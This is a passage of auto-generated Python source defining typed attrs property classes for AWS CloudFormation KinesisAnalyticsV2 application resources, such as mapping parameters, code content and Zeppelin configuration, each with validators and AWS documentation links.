Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-jsonmappingparameters.html
Property Document:
- ``rp_RecordRowPath``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-jsonmappingparameters.html#cfn-kinesisanalyticsv2-application-jsonmappingparameters-recordrowpath
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.JSONMappingParameters"
rp_RecordRowPath: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordRowPath"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-jsonmappingparameters.html#cfn-kinesisanalyticsv2-application-jsonmappingparameters-recordrowpath"""
@attr.s
class PropApplicationCodeContent(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CodeContent"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html
Property Document:
- ``p_S3ContentLocation``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-s3contentlocation
- ``p_TextContent``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-textcontent
- ``p_ZipFileContent``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-zipfilecontent
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CodeContent"
p_S3ContentLocation: typing.Union['PropApplicationS3ContentLocation', dict] = attr.ib(
default=None,
converter=PropApplicationS3ContentLocation.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationS3ContentLocation)),
metadata={AttrMeta.PROPERTY_NAME: "S3ContentLocation"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-s3contentlocation"""
p_TextContent: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "TextContent"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-textcontent"""
p_ZipFileContent: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "ZipFileContent"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-codecontent.html#cfn-kinesisanalyticsv2-application-codecontent-zipfilecontent"""
@attr.s
class PropApplicationReferenceDataSourceS3ReferenceDataSource(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.S3ReferenceDataSource"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html
Property Document:
- ``rp_BucketARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-bucketarn
- ``rp_FileKey``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-filekey
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.S3ReferenceDataSource"
rp_BucketARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "BucketARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-bucketarn"""
rp_FileKey: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "FileKey"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-s3referencedatasource-filekey"""
@attr.s
class PropApplicationEnvironmentProperties(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.EnvironmentProperties"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-environmentproperties.html
Property Document:
- ``p_PropertyGroups``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-environmentproperties.html#cfn-kinesisanalyticsv2-application-environmentproperties-propertygroups
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.EnvironmentProperties"
p_PropertyGroups: typing.List[typing.Union['PropApplicationPropertyGroup', dict]] = attr.ib(
default=None,
converter=PropApplicationPropertyGroup.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationPropertyGroup), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "PropertyGroups"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-environmentproperties.html#cfn-kinesisanalyticsv2-application-environmentproperties-propertygroups"""
@attr.s
class PropApplicationCatalogConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CatalogConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-catalogconfiguration.html
Property Document:
- ``p_GlueDataCatalogConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-catalogconfiguration.html#cfn-kinesisanalyticsv2-application-catalogconfiguration-gluedatacatalogconfiguration
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CatalogConfiguration"
p_GlueDataCatalogConfiguration: typing.Union['PropApplicationGlueDataCatalogConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationGlueDataCatalogConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationGlueDataCatalogConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "GlueDataCatalogConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-catalogconfiguration.html#cfn-kinesisanalyticsv2-application-catalogconfiguration-gluedatacatalogconfiguration"""
@attr.s
class PropApplicationReferenceDataSourceCSVMappingParameters(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.CSVMappingParameters"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html
Property Document:
- ``rp_RecordColumnDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordcolumndelimiter
- ``rp_RecordRowDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordrowdelimiter
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.CSVMappingParameters"
rp_RecordColumnDelimiter: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordColumnDelimiter"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordcolumndelimiter"""
rp_RecordRowDelimiter: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordRowDelimiter"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-csvmappingparameters-recordrowdelimiter"""
@attr.s
class PropApplicationCustomArtifactConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CustomArtifactConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html
Property Document:
- ``rp_ArtifactType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-artifacttype
- ``p_MavenReference``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-mavenreference
- ``p_S3ContentLocation``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-s3contentlocation
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CustomArtifactConfiguration"
rp_ArtifactType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ArtifactType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-artifacttype"""
p_MavenReference: typing.Union['PropApplicationMavenReference', dict] = attr.ib(
default=None,
converter=PropApplicationMavenReference.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationMavenReference)),
metadata={AttrMeta.PROPERTY_NAME: "MavenReference"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-mavenreference"""
p_S3ContentLocation: typing.Union['PropApplicationS3ContentLocation', dict] = attr.ib(
default=None,
converter=PropApplicationS3ContentLocation.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationS3ContentLocation)),
metadata={AttrMeta.PROPERTY_NAME: "S3ContentLocation"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactconfiguration.html#cfn-kinesisanalyticsv2-application-customartifactconfiguration-s3contentlocation"""
@attr.s
class PropApplicationDeployAsApplicationConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.DeployAsApplicationConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-deployasapplicationconfiguration.html
Property Document:
- ``rp_S3ContentLocation``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-deployasapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-deployasapplicationconfiguration-s3contentlocation
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.DeployAsApplicationConfiguration"
rp_S3ContentLocation: typing.Union['PropApplicationS3ContentBaseLocation', dict] = attr.ib(
default=None,
converter=PropApplicationS3ContentBaseLocation.from_dict,
validator=attr.validators.instance_of(PropApplicationS3ContentBaseLocation),
metadata={AttrMeta.PROPERTY_NAME: "S3ContentLocation"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-deployasapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-deployasapplicationconfiguration-s3contentlocation"""
@attr.s
class PropApplicationMappingParameters(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.MappingParameters"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html
Property Document:
- ``p_CSVMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-csvmappingparameters
- ``p_JSONMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-jsonmappingparameters
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.MappingParameters"
p_CSVMappingParameters: typing.Union['PropApplicationCSVMappingParameters', dict] = attr.ib(
default=None,
converter=PropApplicationCSVMappingParameters.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCSVMappingParameters)),
metadata={AttrMeta.PROPERTY_NAME: "CSVMappingParameters"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-csvmappingparameters"""
p_JSONMappingParameters: typing.Union['PropApplicationJSONMappingParameters', dict] = attr.ib(
default=None,
converter=PropApplicationJSONMappingParameters.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationJSONMappingParameters)),
metadata={AttrMeta.PROPERTY_NAME: "JSONMappingParameters"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mappingparameters.html#cfn-kinesisanalyticsv2-application-mappingparameters-jsonmappingparameters"""
@attr.s
class PropApplicationFlinkApplicationConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.FlinkApplicationConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html
Property Document:
- ``p_CheckpointConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-checkpointconfiguration
- ``p_MonitoringConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-monitoringconfiguration
- ``p_ParallelismConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-parallelismconfiguration
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.FlinkApplicationConfiguration"
p_CheckpointConfiguration: typing.Union['PropApplicationCheckpointConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationCheckpointConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCheckpointConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "CheckpointConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-checkpointconfiguration"""
p_MonitoringConfiguration: typing.Union['PropApplicationMonitoringConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationMonitoringConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationMonitoringConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "MonitoringConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-monitoringconfiguration"""
p_ParallelismConfiguration: typing.Union['PropApplicationParallelismConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationParallelismConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationParallelismConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "ParallelismConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-flinkapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-flinkapplicationconfiguration-parallelismconfiguration"""
@attr.s
class PropApplicationOutputOutput(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.Output"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html
Property Document:
- ``rp_DestinationSchema``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-destinationschema
- ``p_KinesisFirehoseOutput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisfirehoseoutput
- ``p_KinesisStreamsOutput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisstreamsoutput
- ``p_LambdaOutput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-lambdaoutput
- ``p_Name``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-name
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.Output"
rp_DestinationSchema: typing.Union['PropApplicationOutputDestinationSchema', dict] = attr.ib(
default=None,
converter=PropApplicationOutputDestinationSchema.from_dict,
validator=attr.validators.instance_of(PropApplicationOutputDestinationSchema),
metadata={AttrMeta.PROPERTY_NAME: "DestinationSchema"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-destinationschema"""
p_KinesisFirehoseOutput: typing.Union['PropApplicationOutputKinesisFirehoseOutput', dict] = attr.ib(
default=None,
converter=PropApplicationOutputKinesisFirehoseOutput.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationOutputKinesisFirehoseOutput)),
metadata={AttrMeta.PROPERTY_NAME: "KinesisFirehoseOutput"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisfirehoseoutput"""
p_KinesisStreamsOutput: typing.Union['PropApplicationOutputKinesisStreamsOutput', dict] = attr.ib(
default=None,
converter=PropApplicationOutputKinesisStreamsOutput.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationOutputKinesisStreamsOutput)),
metadata={AttrMeta.PROPERTY_NAME: "KinesisStreamsOutput"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-kinesisstreamsoutput"""
p_LambdaOutput: typing.Union['PropApplicationOutputLambdaOutput', dict] = attr.ib(
default=None,
converter=PropApplicationOutputLambdaOutput.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationOutputLambdaOutput)),
metadata={AttrMeta.PROPERTY_NAME: "LambdaOutput"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-lambdaoutput"""
p_Name: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "Name"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-output.html#cfn-kinesisanalyticsv2-applicationoutput-output-name"""
@attr.s
class PropApplicationInputProcessingConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputProcessingConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputprocessingconfiguration.html
Property Document:
- ``p_InputLambdaProcessor``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputprocessingconfiguration.html#cfn-kinesisanalyticsv2-application-inputprocessingconfiguration-inputlambdaprocessor
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputProcessingConfiguration"
p_InputLambdaProcessor: typing.Union['PropApplicationInputLambdaProcessor', dict] = attr.ib(
default=None,
converter=PropApplicationInputLambdaProcessor.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationInputLambdaProcessor)),
metadata={AttrMeta.PROPERTY_NAME: "InputLambdaProcessor"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputprocessingconfiguration.html#cfn-kinesisanalyticsv2-application-inputprocessingconfiguration-inputlambdaprocessor"""
@attr.s
class PropApplicationApplicationCodeConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ApplicationCodeConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html
Property Document:
- ``rp_CodeContent``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontent
- ``rp_CodeContentType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontenttype
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ApplicationCodeConfiguration"
rp_CodeContent: typing.Union['PropApplicationCodeContent', dict] = attr.ib(
default=None,
converter=PropApplicationCodeContent.from_dict,
validator=attr.validators.instance_of(PropApplicationCodeContent),
metadata={AttrMeta.PROPERTY_NAME: "CodeContent"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontent"""
rp_CodeContentType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "CodeContentType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationcodeconfiguration.html#cfn-kinesisanalyticsv2-application-applicationcodeconfiguration-codecontenttype"""
@attr.s
class PropApplicationZeppelinApplicationConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ZeppelinApplicationConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html
Property Document:
- ``p_CatalogConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-catalogconfiguration
- ``p_CustomArtifactsConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-customartifactsconfiguration
- ``p_DeployAsApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-deployasapplicationconfiguration
- ``p_MonitoringConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-monitoringconfiguration
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ZeppelinApplicationConfiguration"
p_CatalogConfiguration: typing.Union['PropApplicationCatalogConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationCatalogConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCatalogConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "CatalogConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-catalogconfiguration"""
p_CustomArtifactsConfiguration: typing.Union['PropApplicationCustomArtifactsConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationCustomArtifactsConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationCustomArtifactsConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "CustomArtifactsConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-customartifactsconfiguration"""
p_DeployAsApplicationConfiguration: typing.Union['PropApplicationDeployAsApplicationConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationDeployAsApplicationConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationDeployAsApplicationConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "DeployAsApplicationConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-deployasapplicationconfiguration"""
p_MonitoringConfiguration: typing.Union['PropApplicationZeppelinMonitoringConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationZeppelinMonitoringConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationZeppelinMonitoringConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "MonitoringConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinapplicationconfiguration-monitoringconfiguration"""
@attr.s
class PropApplicationReferenceDataSourceMappingParameters(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.MappingParameters"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html
Property Document:
- ``p_CSVMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-csvmappingparameters
- ``p_JSONMappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-jsonmappingparameters
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.MappingParameters"
p_CSVMappingParameters: typing.Union['PropApplicationReferenceDataSourceCSVMappingParameters', dict] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceCSVMappingParameters.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceCSVMappingParameters)),
metadata={AttrMeta.PROPERTY_NAME: "CSVMappingParameters"},
)
